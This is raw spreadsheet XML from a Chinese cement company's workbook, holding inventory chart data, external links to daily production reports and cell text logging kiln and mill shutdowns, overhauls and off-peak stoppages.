                  <a:srgbClr val="99330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库存!$E$22:$AI$22</c:f>
              <c:numCache>
                <c:formatCode>0.00</c:formatCode>
                <c:ptCount val="31"/>
                <c:pt idx="0">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>0.150256</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>0.150256</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:marker val="1"/>
        <c:smooth val="0"/>
        <c:axId val="212286848"/>
        <c:axId val="212296832"/>
      </c:lineChart>
      <c:lineChart>
        <c:grouping val="standard"/>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="8"/>
          <c:order val="8"/>
          <c:tx>
            <c:strRef>
              <c:f>库存!$C$23</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>合计</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln w="28575" cap="rnd" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:tint val="76667"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:marker>
            <c:symbol val="dash"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="808000"/>
              </a:solidFill>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:dLbls>
            <c:spPr>
              <a:noFill/>
              <a:ln w="25400">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:txPr>
              <a:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="ellipsis" vert="horz" wrap="square" lIns="38100" tIns="19050" rIns="38100" bIns="19050"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库存!$E$2:$AI$2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库存!$E$23:$AI$23</c:f>
              <c:numCache>
                <c:formatCode>0.00</c:formatCode>
                <c:ptCount val="31"/>
                <c:pt idx="0">
                  <c:v>26.1561994</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>25.3917754</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>25.0623991</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>25.1151838</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>25.6404537</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>26.0523157</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>25.7123798</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>25.6634258</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>25.2329085</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>24.8898025</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>24.8738965</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>24.6961885</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>24.7980034</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>24.5174764</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>24.5045469</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>23.8562399</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>23.3766963</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>23.0162502</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>22.3171795</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>21.9721865</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>21.9186625</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>21.6312115</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>21.6183499</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>21.7185547</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>21.2369957</c:v>
                </c:pt>
                <c:pt idx="25">
                  <c:v>21.1875317</c:v>
                </c:pt>
                <c:pt idx="26">
                  <c:v>21.2228627</c:v>
                </c:pt>
                <c:pt idx="27">
                  <c:v>21.067299</c:v>
                </c:pt>
                <c:pt idx="28">
                  <c:v>20.646031</c:v>
                </c:pt>
                <c:pt idx="29">
                  <c:v>20.6519052</c:v>
                </c:pt>
                <c:pt idx="30">
                  <c:v>20.3209539</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:marker val="1"/>
        <c:smooth val="0"/>
        <c:axId val="212298368"/>
        <c:axId val="212304256"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="212286848"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:majorGridlines>
          <c:spPr>
            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="808080">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
        </c:majorGridlines>
        <c:numFmt formatCode="0" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:spPr>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="808080">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
          <a:effectLst/>
        </c:spPr>
        <c:txPr>
          <a:bodyPr rot="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2296832"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="212296832"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="l"/>
        <c:majorGridlines>
          <c:spPr>
            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="808080">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
        </c:majorGridlines>
        <c:numFmt formatCode="0.00" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:spPr>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="808080">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
          <a:effectLst/>
        </c:spPr>
        <c:txPr>
          <a:bodyPr rot="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2286848"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:catAx>
        <c:axId val="212298368"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="0" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="none"/>
        <c:txPr>
          <a:bodyPr rot="-6000000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2304256"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="212304256"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="r"/>
        <c:numFmt formatCode="0.00" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:spPr>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="808080">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
          </a:ln>
          <a:effectLst/>
        </c:spPr>
        <c:txPr>
          <a:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr lang="zh-CN" sz="10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crossAx val="212298368"/>
        <c:crosses val="max"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:spPr>
        <a:solidFill>
          <a:srgbClr val="FFFFFF">
            <a:alpha val="100000"/>
          </a:srgbClr>
        </a:solidFill>
        <a:ln w="9525">
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:layout>
        <c:manualLayout>
          <c:xMode val="edge"/>
          <c:yMode val="edge"/>
          <c:x val="0.00513874614594095"/>
          <c:y val="0.205087440381558"/>
          <c:w val="0.0652500451832044"/>
          <c:h val="0.440250032338978"/>
        </c:manualLayout>
      </c:layout>
      <c:overlay val="0"/>
      <c:spPr>
        <a:noFill/>
        <a:ln w="3175">
          <a:noFill/>
        </a:ln>
      </c:spPr>
      <c:txPr>
        <a:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="ellipsis" vert="horz" wrap="square" anchor="ctr" anchorCtr="1"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:defRPr lang="zh-CN" sz="775"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legend>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="gap"/>
    <c:showDLblsOverMax val="0"/>
    <c:extLst>
      <c:ext uri="{0b15fc19-7d7d-44ad-8c2d-2c3a37ce22c3}">
        <chartProps xmlns="https://web.wps.cn/et/2018/main" chartId="{a556d554-39b2-4c44-b549-69938f20c25b}"/>
      </c:ext>
    </c:extLst>
  </c:chart>
  <c:spPr>
    <a:solidFill>
      <a:srgbClr val="FFFFFF">
        <a:alpha val="100000"/>
      </a:srgbClr>
    </a:solidFill>
    <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
      <a:solidFill>
        <a:srgbClr val="808080">
          <a:alpha val="100000"/>
        </a:srgbClr>
      </a:solidFill>
      <a:prstDash val="solid"/>
      <a:round/>
    </a:ln>
    <a:effectLst/>
  </c:spPr>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr lang="zh-CN" sz="10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defRPr>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13</xdr:col>
      <xdr:colOff>352425</xdr:colOff>
      <xdr:row>33</xdr:row>
      <xdr:rowOff>19050</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="17015846" name="图表 1"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="9267825" cy="5991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13</xdr:col>
      <xdr:colOff>352425</xdr:colOff>
      <xdr:row>33</xdr:row>
      <xdr:rowOff>19050</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="15655369" name="图表 1"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="9267825" cy="5991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13</xdr:col>
      <xdr:colOff>352425</xdr:colOff>
      <xdr:row>33</xdr:row>
      <xdr:rowOff>19050</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="15652300" name="图表 1"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="9267825" cy="5991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AS&#23433;&#30722;2015&#24180;7&#26376;&#26085;&#25253;&#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CY&#26361;&#36828;2015&#24180;7&#26376;&#26085;&#25253;&#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DH&#24503;&#21270;2015&#24180;7&#26376;&#26085;&#25253;&#349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DH&#22823;&#28246;2015&#24180;7&#26376;&#26085;&#25253;&#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SC&#39034;&#26124;2015&#24180;7&#26376;&#26085;&#25253;&#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MH&#38397;&#20399;2015&#24180;7&#26376;&#26085;&#25253;&#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ND&#23425;&#24503;2015&#24180;7&#26376;&#26085;&#25253;&#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5774;&#22791;&#36816;&#34892;&#29366;&#2091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1119;&#24314;&#27700;&#27877;\lhl&#31119;&#24314;&#27700;&#27877;\&#29983;&#20135;&#26085;&#25253;\202001\26"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3433;&#30722;&#24314;&#31119;2025&#24180;12&#26376;&#26085;&#25253;&#3492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7704;&#23433;&#24314;&#31119;2025&#24180;12&#26376;&#26085;&#25253;&#349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7329;&#38134;&#28246;&#27700;&#27877;2025&#24180;12&#26376;&#26085;&#25253;&#349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9034;&#26124;&#28860;&#30707;2025&#24180;12&#26376;&#26085;&#25253;&#3492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1119;&#24030;&#28860;&#30707;2025&#24180;12&#26376;&#26085;&#25253;&#3492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3425;&#24503;&#24314;&#31119;2025&#24180;12&#26376;&#26085;&#25253;&#3492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3433;&#30722;&#24314;&#31119;&#24503;&#21270;&#20998;&#20844;&#21496;2025&#24180;12&#26376;&#26085;&#25253;&#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NTKNWKPSMTQSB"/>
      <sheetName val="26"/>
      <sheetName val="27"/>
      <sheetName val="28"/>
      <sheetName val="29"/>
      <sheetName val="30"/>
      <sheetName val="31"/>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2">
          <cell r="S12">
            <v>3696.51</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Z12">
            <v>2953.055</v>
          </cell>
        </row>
        <row r="17">
          <cell r="S17">
            <v>9938.78</v>
          </cell>
        </row>
        <row r="19">
          <cell r="S19">
            <v>0</v>
          </cell>
        </row>
        <row r="19">
          <cell r="W19">
            <v>0</v>
          </cell>
        </row>
        <row r="19">
          <cell r="Z19">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="S20">
            <v>7574.68</v>
          </cell>
        </row>
        <row r="20">
          <cell r="W20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="Z20">
            <v>8153.622</v>
          </cell>
        </row>
        <row r="21">
          <cell r="S21">
            <v>175.45</v>
          </cell>
        </row>
        <row r="21">
          <cell r="W21">
            <v>0</v>
          </cell>
        </row>
        <row r="21">
          <cell r="Z21">
            <v>138.751</v>
          </cell>
        </row>
        <row r="22">
          <cell r="S22">
            <v>14.6999999999998</v>
          </cell>
        </row>
        <row r="22">
          <cell r="W22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="Z22">
            <v>0.219999999999818</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6"/>
      <sheetName val="27"/>
      <sheetName val="28"/>
      <sheetName val="29"/>
      <sheetName val="3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70">
          <cell r="F70">
            <v>8252</v>
          </cell>
        </row>
        <row r="70">
          <cell r="H70">
            <v>0</v>
          </cell>
        </row>
        <row r="70">
          <cell r="K70">
            <v>0</v>
          </cell>
        </row>
        <row r="70">
          <cell r="N70">
            <v>4300</v>
          </cell>
        </row>
        <row r="72">
          <cell r="F72">
            <v>500</v>
          </cell>
        </row>
        <row r="72">
          <cell r="H72">
            <v>0</v>
          </cell>
        </row>
        <row r="72">
          <cell r="K72">
            <v>0</v>
          </cell>
        </row>
        <row r="72">
          <cell r="N72">
            <v>400</v>
          </cell>
        </row>
        <row r="73">
          <cell r="F73">
            <v>750</v>
          </cell>
        </row>
        <row r="73">
          <cell r="H73">
            <v>0</v>
          </cell>
        </row>
        <row r="73">
          <cell r="K73">
            <v>0</v>
          </cell>
        </row>
        <row r="73">
          <cell r="N73">
            <v>750</v>
          </cell>
        </row>
        <row r="74">
          <cell r="F74">
            <v>0</v>
          </cell>
        </row>
        <row r="74">
          <cell r="H74">
            <v>0</v>
          </cell>
        </row>
        <row r="74">
          <cell r="K74">
            <v>0</v>
          </cell>
        </row>
        <row r="74">
          <cell r="N74">
            <v>0</v>
          </cell>
        </row>
        <row r="75">
          <cell r="F75">
            <v>7312.99990873016</v>
          </cell>
        </row>
        <row r="75">
          <cell r="H75">
            <v>0</v>
          </cell>
        </row>
        <row r="75">
          <cell r="K75">
            <v>0</v>
          </cell>
        </row>
        <row r="75">
          <cell r="N75">
            <v>4777.9962414966</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NTKNWKPSMTQSB"/>
      <sheetName val="26"/>
      <sheetName val="27"/>
      <sheetName val="28"/>
      <sheetName val="29"/>
      <sheetName val="30"/>
      <sheetName val="31"/>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26"/>
      <sheetName val="27"/>
      <sheetName val="28"/>
      <sheetName val="29"/>
      <sheetName val="3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7">
          <cell r="E47">
            <v>0</v>
          </cell>
        </row>
        <row r="47">
          <cell r="L47">
            <v>0</v>
          </cell>
        </row>
        <row r="48">
          <cell r="E48">
            <v>840.85</v>
          </cell>
        </row>
        <row r="48">
          <cell r="L48">
            <v>840.85</v>
          </cell>
        </row>
        <row r="51">
          <cell r="E51">
            <v>5500.56999999998</v>
          </cell>
        </row>
        <row r="51">
          <cell r="L51">
            <v>5500.56999999998</v>
          </cell>
        </row>
        <row r="53">
          <cell r="L53">
            <v>0</v>
          </cell>
        </row>
        <row r="54">
          <cell r="L54">
            <v>0</v>
          </cell>
        </row>
        <row r="55">
          <cell r="L55">
            <v>1796.626</v>
          </cell>
        </row>
        <row r="56">
          <cell r="L56">
            <v>0</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26"/>
      <sheetName val="27"/>
      <sheetName val="28"/>
      <sheetName val="29"/>
      <sheetName val="3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6">
          <cell r="Y6">
            <v>11614.811</v>
          </cell>
        </row>
        <row r="6">
          <cell r="AF6">
            <v>9515.614</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>14957.063</v>
          </cell>
        </row>
        <row r="7">
          <cell r="AF7">
            <v>12301.632</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>5367.02</v>
          </cell>
        </row>
        <row r="8">
          <cell r="AF8">
            <v>5928.358</v>
          </cell>
        </row>
        <row r="11">
          <cell r="Y11">
            <v>1155.671</v>
          </cell>
        </row>
        <row r="11">
          <cell r="AF11">
            <v>2013.538</v>
          </cell>
        </row>
        <row r="12">
          <cell r="Y12">
            <v>219.633999999999</v>
          </cell>
        </row>
        <row r="12">
          <cell r="AF12">
            <v>865.706999999999</v>
          </cell>
        </row>
        <row r="13">
          <cell r="Y13">
            <v>560.129</v>
          </cell>
        </row>
        <row r="13">
          <cell r="AF13">
            <v>780.889</v>
          </cell>
        </row>
        <row r="14">
          <cell r="Y14">
            <v>139.721</v>
          </cell>
        </row>
        <row r="14">
          <cell r="AF14">
            <v>139.721</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26"/>
      <sheetName val="27"/>
      <sheetName val="28"/>
      <sheetName val="29"/>
      <sheetName val="3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5">
          <cell r="M15">
            <v>0</v>
          </cell>
          <cell r="N15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="Q15">
            <v>0</v>
          </cell>
        </row>
        <row r="15">
          <cell r="T15">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="M16">
            <v>1399.775</v>
          </cell>
          <cell r="N16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="Q16">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="T16">
            <v>1335.128</v>
          </cell>
        </row>
        <row r="17">
          <cell r="M17">
            <v>1374.635</v>
          </cell>
          <cell r="N17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="Q17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="T17">
            <v>644.635</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="3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26"/>
      <sheetName val="27"/>
      <sheetName val="28"/>
      <sheetName val="29"/>
      <sheetName val="3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调整表"/>
      <sheetName val="月报"/>
      <sheetName val="月份数据"/>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3">
          <cell r="D43">
            <v>555.928999999999</v>
          </cell>
          <cell r="E43">
            <v>0</v>
          </cell>
        </row>
        <row r="43">
          <cell r="H43">
            <v>0</v>
          </cell>
        </row>
        <row r="43">
          <cell r="K43">
            <v>384.908999999999</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="3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ICLPTOVOVTNRYY"/>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KMhz"/>
      <sheetName val="hz"/>
      <sheetName val="ldl"/>
    </sheetNames>
    <sheetDataSet>
      <sheetData sheetId="0"/>
      <sheetData sheetId="1">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:正常。2#窑:续停。水泥磨:1#磨：10:00-24:00避峰停机；2#磨：10:00-24:00避峰停机；3#磨：9:20-22:10避峰停机；4#磨：大修续停。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:6:18-24:00头排变频器进线柜短路多元件损坏停窑（电气）。A组磨：8:00-24:00避峰停机。D1#磨：8:00-24:00避峰停机，D2#磨：8:00-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:续停；1#磨:14:30-22:25避峰停机。2#磨:8:00-24:00避峰停机。3#磨:9:45-23:30避峰停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨8:00-22:15避峰停机:14.25小时(避峰)。2#磨8:00-22:15避峰停机:14.25小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="2">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:正常。2#窑:续停。水泥磨:1#磨：10:00-24:00避峰停机；2#磨：10:00-22:30避峰停机；3#磨：10:00-22:10避峰停机；4#磨：大修续停。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:续停。A组磨：8:00-24:00避峰停机。D1#磨：8:45-24:00避峰停机，D2#磨：8:45-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:续停；1#磨:8:00-18:30避峰停机。2#磨:8:00-24:00避峰停机。3#磨:8:00-22:30避峰停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨8:00-22:15避峰停机:14.25小时(避峰)。2#磨8:00-24:00避峰停机:16小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="3">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:正常。2#窑:续停。水泥磨:1#磨：10:00-23:10避峰停机；2#磨：10:00-22:30避峰停机；3#磨：9:20-22:10避峰停机；4#磨：大修续停。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:0:00-6:03续停，6:03-24:00转错峰停机（错峰）。A组磨：11:40-24:00避峰停机。D1#磨：9:00-24:00避峰停机，D2#磨：9:00-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:续停；1#磨:8:00-22:45避峰停机。2#磨:正常。3#磨:8:00-22:15避峰停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨8:00-23:00避峰停机:15小时(避峰)。2#磨8:00-24:00避峰停机:16小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="4">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:正常。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：10:00-22:20避峰停机；3#磨：10:00-22:30避峰停机；4#磨：0:00-23:20大修续停。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:9:28点火升温，20:18投料。A组磨：8:10-24:00避峰停机。D1#磨：9:25-24:00避峰停机，D2#磨：9:25-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:续停；1#磨:14:30-22:20避峰停机。2#磨:8:00-22:30避峰停机。3#磨:14:40-22:10避峰停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨正常运行。2#磨14:30-23:15避峰停机:8.75小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="5">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:正常。2#窑:续停。水泥磨:1#磨：10:00-22:10避峰停机；2#磨：10:00-22:10避峰停机；3#磨：10:00-22:10避峰停机；4#磨：正常。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
            <v>窑:正常。A组磨：8:00-11:00避峰停机;16:25-24:00避峰停机。D1#磨：8:00-10:00避峰停机;20:00-24:00避峰停机，D2#磨：8:00-10:00避峰停机;20:00-24:00避峰停机。</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>窑:续停。水泥磨:续停。</v>
          </cell>
        </row>
        <row r="74">
          <cell r="Q74" t="str">
            <v>1#窑:续停；2#窑:续停；1#磨:15:00-22:15避峰停机。2#磨:8:00-24:00避峰停机。3#磨:7:35-10:15避峰停机。</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77" t="str">
            <v>1#磨10:00-22:15避峰停机:12.25小时(避峰)。2#磨8:00-22:15避峰停机:14.25小时(避峰)。</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80" t="str">
            <v>水泥磨:00：00-24:00续停机。</v>
          </cell>
        </row>
        <row r="83">
          <cell r="Q83" t="str">
            <v>2#磨：续停。</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="6">
        <row r="62">
          <cell r="Q62" t="str">
            <v>1#窑:正常。2#窑:续停。水泥磨:1#磨：9:30-22:10避峰停机；2#磨：10:00-22:10避峰停机；3#磨：8:00-22:10库满停机；4#磨：7:20-24:00库满停机。</v>
          </cell>
        </row>
        <row r="65">
          <cell r="Q65" t="str">
